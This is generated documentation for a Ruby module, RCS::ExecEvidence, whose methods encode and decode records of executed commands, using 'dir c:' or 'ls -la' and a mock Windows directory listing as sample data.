Module: RCS::ExecEvidence
- Defined in:
- lib/rcs-common/evidence/exec.rb
Instance Method Summary collapse
- #additional_header ⇒ Object
- #content ⇒ Object
- #decode_additional_header(data) ⇒ Object
- #decode_content(common_info, chunks) {|info| ... } ⇒ Object
- #generate_content ⇒ Object
Instance Method Details
#additional_header ⇒ Object
34 35 36 37 38 39 40 41 42 43 44 |
# File 'lib/rcs-common/evidence/exec.rb', line 34 def additional_header command = ["dir c:", "ls -la"].sample command = command.to_utf16le_binary header = StringIO.new header.write [command.size].pack("I") header.write command header.string end |
#content ⇒ Object
7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
# File 'lib/rcs-common/evidence/exec.rb', line 7 def content output = <<-eos Volume in drive C has no label. Volume Serial Number is 587F-CB14 Directory of c:\ 27/02/2011 14:14 1.024 .rnd 25/10/2011 13:06 <DIR> inetpub 03/05/2012 11:14 0 output.txt 14/07/2009 05:20 <DIR> PerfLogs 28/04/2011 16:11 <DIR> Program Files 27/02/2011 14:14 <DIR> Program Files (x86) 04/02/2011 15:22 <DIR> Temp 23/03/2012 12:42 <DIR> Users 25/10/2011 13:05 <DIR> Windows 2 File(s) 1.024 bytes 7 Dir(s) 39.704.879.104 bytes free ������������������������������������������������������������������������������������������������������������������������������������������������������������������� eos output.to_utf16le_binary end |
#decode_additional_header(data) ⇒ Object
46 47 48 49 50 51 52 53 54 55 56 57 |
# File 'lib/rcs-common/evidence/exec.rb', line 46 def decode_additional_header(data) raise EvidenceDeserializeError.new("incomplete EXEC") if data.nil? or data.bytesize == 0 ret = Hash.new ret[:data] = Hash.new binary = StringIO.new data command_len = binary.read(4).unpack("I").first ret[:data][:command] = binary.read(command_len).utf16le_to_utf8 ret end |
#decode_content(common_info, chunks) {|info| ... } ⇒ Object
59 60 61 62 63 64 65 66 67 |
# File 'lib/rcs-common/evidence/exec.rb', line 59 def decode_content(common_info, chunks) info = Hash[common_info] info[:data] = Hash.new if info[:data].nil? info[:grid_content] = chunks.join info[:data][:content] = info[:grid_content].utf16le_to_utf8 yield info if block_given? :delete_raw end |
#generate_content ⇒ Object
30 31 32 |
# File 'lib/rcs-common/evidence/exec.rb', line 30 def generate_content [ content ] end |